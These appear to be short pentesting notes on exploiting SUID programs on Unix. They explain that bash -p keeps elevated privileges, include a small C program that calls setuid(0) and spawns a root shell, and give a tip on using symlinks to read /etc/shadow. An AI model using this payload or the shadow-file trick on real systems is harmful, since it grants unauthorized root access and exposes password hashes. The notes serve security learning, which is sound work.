SUID Bit

Good list of things to look out for in SUID programs. Seriously, check it out:

https://repository.root-me.org/Administration/Unix/EN%20-%20Dangers%20of%20SUID%20Shell%20Scripts.pdf

If you want a root shell when exploiting SUID programs, note that by default bash and sh drop SUID privileges (the effective uid is reset to the real uid at startup). Use the -p flag to avoid dropping privileges (only works for root).

Example C program for exploitation:

#include <stdlib.h>
#include <unistd.h>

/* Runs with the SUID binary's privileges: set the real uid to 0 as well,
 * then spawn bash with -p so it keeps the elevated uid instead of dropping it. */
int main(int argc, char **argv)
{
    (void)argc;
    (void)argv;
    setuid(0);
    system("bash -p");
    return 0;
}

Symlink tip: for some reason (presumably a security measure; this is the kernel's fs.protected_symlinks restriction on symlinks in world-writable sticky directories), you cannot read a symlink to /etc/shadow (and perhaps other files?) from /tmp or /dev/shm, even as root, if that symlink was not created by you. From any user's home directory, for example, it works. This can matter when exploiting SUID or sudoers misconfigurations via symlinks.
